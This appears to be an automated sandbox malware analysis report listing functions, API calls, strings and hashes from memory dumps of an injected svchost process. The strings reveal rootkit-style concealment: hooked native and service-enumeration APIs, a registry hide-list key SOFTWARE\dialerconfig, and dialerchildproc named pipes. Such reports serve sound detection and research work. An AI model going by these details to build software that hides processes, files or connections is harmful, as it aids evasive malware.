Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 67325ab9c1bf59a10d455d8bffd91d13401eaaa9fb1b126a29269b2ed4ac34ab
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: CA61DD32B0169087DF54CF9590487ADB3E2FB58BE4F1C8121EE5A87B98DA38D853D720

Non-executed Functions

Function 0000014E41FD2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000014E41FD2BD0
lstrlenW.KERNEL32 ref: 0000014E41FD2E0A

Part of subcall function 0000014E41FD199C: OpenProcess.KERNEL32 ref: 0000014E41FD19C2
Part of subcall function 0000014E41FD199C: K32GetModuleFileNameExW.KERNEL32 ref: 0000014E41FD19E0
Part of subcall function 0000014E41FD199C: PathFindFileNameW.SHLWAPI ref: 0000014E41FD19EF
Part of subcall function 0000014E41FD199C: lstrlenW.KERNEL32 ref: 0000014E41FD19FB
Part of subcall function 0000014E41FD199C: StrCpyW.SHLWAPI ref: 0000014E41FD1A0E
Part of subcall function 0000014E41FD199C: CloseHandle.KERNEL32 ref: 0000014E41FD1A1C

GetProcAddress.KERNEL32 ref: 0000014E41FD2BE5

Part of subcall function 0000014E41FD152C: StrCmpIW.SHLWAPI ref: 0000014E41FD155D

Part of subcall function 0000014E41FD3844: StrCmpNIW.SHLWAPI ref: 0000014E41FD385C

StrCmpNIW.SHLWAPI ref: 0000014E41FD2C28
lstrlenW.KERNEL32 ref: 0000014E41FD2D50

Strings

NtQueryObject, xrefs: 0000014E41FD2BDB
\Device\Nsi, xrefs: 0000014E41FD2C1B
ntdll.dll, xrefs: 0000014E41FD2BC9

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: effd1d481dd4490a16ad21cf9b2687bc37b8d46439eecc8b1afc957421dada5b
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: DBB16972310A9086FF649FA5D4587E9A3E5FF44B94F485016EE0A937A4DB35CC42C7A0

Function 0000014E41FD7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000014E41FD7DAC
RtlCaptureContext.NTDLL ref: 0000014E41FD7DD9
RtlLookupFunctionEntry.NTDLL ref: 0000014E41FD7DF3
RtlVirtualUnwind.NTDLL ref: 0000014E41FD7E34
IsDebuggerPresent.KERNEL32 ref: 0000014E41FD7E88
SetUnhandledExceptionFilter.KERNEL32 ref: 0000014E41FD7EA9
UnhandledExceptionFilter.KERNEL32 ref: 0000014E41FD7EB4

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 4a8a08b1cb576b9d78726fe8905b333cbd284622d38cdc1c56e494f92cae6b39
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 4B316172305B8489EF609F60E8543EDB3A0FB84758F48412ADA4E87BA4EF38C549C720

Function 0000014E41FDD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000014E41FDD31D
RtlLookupFunctionEntry.NTDLL ref: 0000014E41FDD335
RtlVirtualUnwind.NTDLL ref: 0000014E41FDD370
IsDebuggerPresent.KERNEL32 ref: 0000014E41FDD3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 0000014E41FDD3B3
UnhandledExceptionFilter.KERNEL32 ref: 0000014E41FDD3BE

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 6ff2dff154542a0378403bbbd0c8e4de9d1707aa7ebe8d406dd5d67eefb56c20
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 39313136314F8086DB60CF25E8443EEB3A4FB89764F580116EA9E87BA5DF38C556CB10

Function 0000014E41FD1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000014E41FD1633
HeapAlloc.KERNEL32 ref: 0000014E41FD1642

Part of subcall function 0000014E41FD1268: GetProcessHeap.KERNEL32 ref: 0000014E41FD126E
Part of subcall function 0000014E41FD1268: HeapAlloc.KERNEL32 ref: 0000014E41FD127D
Part of subcall function 0000014E41FD1268: GetProcessHeap.KERNEL32 ref: 0000014E41FD1297
Part of subcall function 0000014E41FD1268: HeapAlloc.KERNEL32 ref: 0000014E41FD12A8

RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16B2
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16DF
RegCloseKey.ADVAPI32 ref: 0000014E41FD16F9
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1719
RegCloseKey.ADVAPI32 ref: 0000014E41FD1734
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1754
RegCloseKey.ADVAPI32 ref: 0000014E41FD176F
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD178F
RegCloseKey.ADVAPI32 ref: 0000014E41FD17AA
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD17CA
RegCloseKey.ADVAPI32 ref: 0000014E41FD17E5
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1805
RegCloseKey.ADVAPI32 ref: 0000014E41FD1820
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1840
RegCloseKey.ADVAPI32 ref: 0000014E41FD185B
RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD187B
RegCloseKey.ADVAPI32 ref: 0000014E41FD1896
RegCloseKey.ADVAPI32 ref: 0000014E41FD18A0

Part of subcall function 0000014E41FD12BC: RegQueryInfoKeyW.ADVAPI32 ref: 0000014E41FD1319
Part of subcall function 0000014E41FD12BC: GetProcessHeap.KERNEL32 ref: 0000014E41FD1327
Part of subcall function 0000014E41FD12BC: HeapAlloc.KERNEL32 ref: 0000014E41FD1338
Part of subcall function 0000014E41FD12BC: RegEnumValueW.ADVAPI32 ref: 0000014E41FD1397
Part of subcall function 0000014E41FD12BC: GetProcessHeap.KERNEL32 ref: 0000014E41FD13DF
Part of subcall function 0000014E41FD12BC: HeapAlloc.KERNEL32 ref: 0000014E41FD13ED
Part of subcall function 0000014E41FD12BC: GetProcessHeap.KERNEL32 ref: 0000014E41FD140A
Part of subcall function 0000014E41FD12BC: HeapFree.KERNEL32 ref: 0000014E41FD1418
Part of subcall function 0000014E41FD12BC: lstrlenW.KERNEL32 ref: 0000014E41FD1421
Part of subcall function 0000014E41FD12BC: GetProcessHeap.KERNEL32 ref: 0000014E41FD142F
Part of subcall function 0000014E41FD12BC: HeapAlloc.KERNEL32 ref: 0000014E41FD143D

Strings

pid, xrefs: 0000014E41FD1712
startup, xrefs: 0000014E41FD16D5
paths, xrefs: 0000014E41FD1788
SOFTWARE\dialerconfig, xrefs: 0000014E41FD1692
process_names, xrefs: 0000014E41FD174D
udp, xrefs: 0000014E41FD1874
tcp_local, xrefs: 0000014E41FD17FE
service_names, xrefs: 0000014E41FD17C3
tcp_remote, xrefs: 0000014E41FD1839

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: a2090c4e061c94f1704aee29069009e9ac06c7e615b494ced23eb7a84219142a
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: ED712836318B1486EF10AF61E8886E9A3F5FB84B98F091111DE4E87B39DF38C546C360

Function 0000014E41FD12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000014E41FD1319
GetProcessHeap.KERNEL32 ref: 0000014E41FD1327
HeapAlloc.KERNEL32 ref: 0000014E41FD1338
RegEnumValueW.ADVAPI32 ref: 0000014E41FD1397

Part of subcall function 0000014E41FD152C: StrCmpIW.SHLWAPI ref: 0000014E41FD155D

GetProcessHeap.KERNEL32 ref: 0000014E41FD13DF
HeapAlloc.KERNEL32 ref: 0000014E41FD13ED
GetProcessHeap.KERNEL32 ref: 0000014E41FD140A
HeapFree.KERNEL32 ref: 0000014E41FD1418
lstrlenW.KERNEL32 ref: 0000014E41FD1421
GetProcessHeap.KERNEL32 ref: 0000014E41FD142F
HeapAlloc.KERNEL32 ref: 0000014E41FD143D
StrCpyW.SHLWAPI ref: 0000014E41FD145F
GetProcessHeap.KERNEL32 ref: 0000014E41FD1476
HeapFree.KERNEL32 ref: 0000014E41FD1484

Strings

d, xrefs: 0000014E41FD135A

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: 013e14f2c87ef41763d25eff144d490c8d2c3adaa6cff7853b3d531281aa9866
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: D5513036708B8886EB55CF62E5483AAB7E1FB89F95F494124DE4A47768DF3CC046C710

Function 0000014E41FD1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000014E41FD1D1F

Part of subcall function 0000014E41FD1FD4: GetModuleHandleA.KERNEL32 ref: 0000014E41FD1FEC
Part of subcall function 0000014E41FD1FD4: GetProcAddress.KERNEL32 ref: 0000014E41FD1FFD

Part of subcall function 0000014E41FD5B30: GetCurrentThreadId.KERNEL32 ref: 0000014E41FD5B6B

Strings

NtQueryDirectoryFile, xrefs: 0000014E41FD1D7F
sechost.dll, xrefs: 0000014E41FD1E39
NtResumeThread, xrefs: 0000014E41FD1D62
EnumServiceGroupW, xrefs: 0000014E41FD1DF0
NtQuerySystemInformation, xrefs: 0000014E41FD1D45
NtEnumerateValueKey, xrefs: 0000014E41FD1DD6
EnumServicesStatusExW, xrefs: 0000014E41FD1E11, 0000014E41FD1E32
advapi32.dll, xrefs: 0000014E41FD1DF7, 0000014E41FD1E18
NtEnumerateKey, xrefs: 0000014E41FD1DB9
NtDeviceIoControlFile, xrefs: 0000014E41FD1E56
NtQueryDirectoryFileEx, xrefs: 0000014E41FD1D9C
ntdll.dll, xrefs: 0000014E41FD1D2D

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: d2164b162b6ae80d87fccfd4c10993e61a433f491f5e0695c4aef27492673104
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 60318274704A4AA0FF04EFA9E8597E4E3A1BF54354F8D5013941A97676AF78C24BC3B0

Function 0000014E41FA6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000014E41FA6938
__scrt_acquire_startup_lock.LIBCMT ref: 0000014E41FA698A
_RTC_Initialize.LIBCMT ref: 0000014E41FA69B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000014E41FA69DE
__scrt_release_startup_lock.LIBCMT ref: 0000014E41FA6A09

Strings

`eh vector copy constructor iterator', xrefs: 0000014E41FA6A3B
scriptor', xrefs: 0000014E41FA6B39, 0000014E41FA6BB2, 0000014E41FA6BEC
`eh vector vbase copy constructor iterator', xrefs: 0000014E41FA69EE
`dynamic initializer for ', xrefs: 0000014E41FA69C7

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 3e159b189dba1bc57bfc5d577fc7ac4b56b81dc430d962f8f9d12e70aa5f2c50
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 3C81C03170064286FE90AB6694593D9E3D0FF897E0F5C80259A09C7FB6EB3DC8478720

Function 0000014E41FDCE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 0000014E41FDCE37
FlsGetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE4C
FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE6D
FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCE9A
FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCEAB
FlsSetValue.KERNEL32(?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCEBC
SetLastError.KERNEL32 ref: 0000014E41FDCED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF0D
FlsSetValue.KERNEL32(?,?,00000001,0000014E41FDECCC,?,?,?,?,0000014E41FDBF9F,?,?,?,?,?,0000014E41FD7AB0), ref: 0000014E41FDCF2C

Part of subcall function 0000014E41FDD6CC: HeapAlloc.KERNEL32 ref: 0000014E41FDD721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF54

Part of subcall function 0000014E41FDD744: HeapFree.KERNEL32 ref: 0000014E41FDD75A
Part of subcall function 0000014E41FDD744: GetLastError.KERNEL32 ref: 0000014E41FDD764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E41FE0A6B,?,?,?,0000014E41FE045C,?,?,?,0000014E41FDC84F), ref: 0000014E41FDCF76

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: d05d1a81437cdd74f7d820c0fbdd9315d75b8d778be0daec336e8a8adf9e924f
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 8141E7B034528441FE69A735955D7F9E3C2BF847B0F1C0B28A92BC66F6EE68D5039230

Function 0000014E41FD2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000014E41FD2259
GetCurrentProcessId.KERNEL32 ref: 0000014E41FD2263

Part of subcall function 0000014E41FD1934: OpenProcess.KERNEL32 ref: 0000014E41FD1952
Part of subcall function 0000014E41FD1934: IsWow64Process.KERNEL32 ref: 0000014E41FD1968
Part of subcall function 0000014E41FD1934: CloseHandle.KERNEL32 ref: 0000014E41FD1983

CreateFileW.KERNEL32 ref: 0000014E41FD22BC
WriteFile.KERNEL32 ref: 0000014E41FD22E4
ReadFile.KERNEL32 ref: 0000014E41FD2303
CloseHandle.KERNEL32 ref: 0000014E41FD230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000014E41FD2293
\\.\pipe\dialerchildproc64, xrefs: 0000014E41FD228C

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 7e5f448f2627fb39cf378e58a67f4c7b29978e30c1d81c84a71b5fabbdbaa53a
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: B0213032718B5482FB10CB25E4483A9A7E0FB85BA4F580215DA5A42BB8CF7CC54ACB10

Function 0000014E41FA9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000014E41FA99A1

Part of subcall function 0000014E41FAA814: __GetUnwindTryBlock.LIBCMT ref: 0000014E41FAA857
Part of subcall function 0000014E41FAA814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000014E41FAA87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000014E41FA9A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000014E41FA9CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000014E41FA9DDA

Strings

csm, xrefs: 0000014E41FA99BB
csm, xrefs: 0000014E41FA9A9C
csm, xrefs: 0000014E41FA9A22

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 092061804e2acfd85856a6fbf8df1efce0ac3395992e54896de2f0b233cc8006
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: F5E16A72704B408AEF609BA5D4883DDB7E0FB557D8F5C4125EA8997FA5CB38C092C760

Function 0000014E41FDA544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000014E41FDA5A1

Part of subcall function 0000014E41FDB414: __GetUnwindTryBlock.LIBCMT ref: 0000014E41FDB457
Part of subcall function 0000014E41FDB414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000014E41FDB47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000014E41FDA679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000014E41FDA8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 0000014E41FDA9DA

Strings

csm, xrefs: 0000014E41FDA622
csm, xrefs: 0000014E41FDA5BB
csm, xrefs: 0000014E41FDA69C

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: d2352766757894f1e6b2819fe3e7d64d43612c435bf147b291665c758718f4e6
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 43E16B72704B408AEF60DF6594493EDB7E0FB85B98F180115EE8E97BA9CB34C492C725

Function 0000014E41FDF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32 ref: 0000014E41FDF510
GetProcAddress.KERNEL32 ref: 0000014E41FDF51C

Strings

api-ms-, xrefs: 0000014E41FDF45A
ext-ms-, xrefs: 0000014E41FDF46D

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: eccfb42c00e0fcebc11fba8db2cb5dd556603cf0515602b7340d8b3a720e917a
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: A0418032315A5091FF16CB56E808BE9A3D6BF46BA0F5D42299D0FD77A4EE38C4478360

Function 0000014E41FD104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000014E41FD10B1
RegEnumValueW.ADVAPI32 ref: 0000014E41FD1117
GetProcessHeap.KERNEL32 ref: 0000014E41FD115A
HeapAlloc.KERNEL32 ref: 0000014E41FD1168
GetProcessHeap.KERNEL32 ref: 0000014E41FD1185
HeapFree.KERNEL32 ref: 0000014E41FD1193

Strings

d, xrefs: 0000014E41FD10D6

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: dcb51b6df01793caf54422eba4bcf925065baaae7f996ed60d537fcaac24bad6
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 4A414233218B84C6EB60CF21E44879EB7E5F789B98F448119DA8A47768DF3CC546CB50

Function 0000014E41FDD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD087
FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0A6
FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0CE
FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0DF
FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0F0

Strings

1%, xrefs: 0000014E41FDD0CE
Y%, xrefs: 0000014E41FDD0A6

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: a9bf51a53c9a1f80fc76c82896e2421d109dbda82caf93dda9c71af6b8fc7838
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: D0111C7070468441FE68A735995D7F9E3C6BF847F0F1C4325A82BC6AFADE68C5039620

Function 0000014E41FD7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000014E41FD7538
__scrt_acquire_startup_lock.LIBCMT ref: 0000014E41FD758A
_RTC_Initialize.LIBCMT ref: 0000014E41FD75B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000014E41FD75DE
__scrt_release_startup_lock.LIBCMT ref: 0000014E41FD7609

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

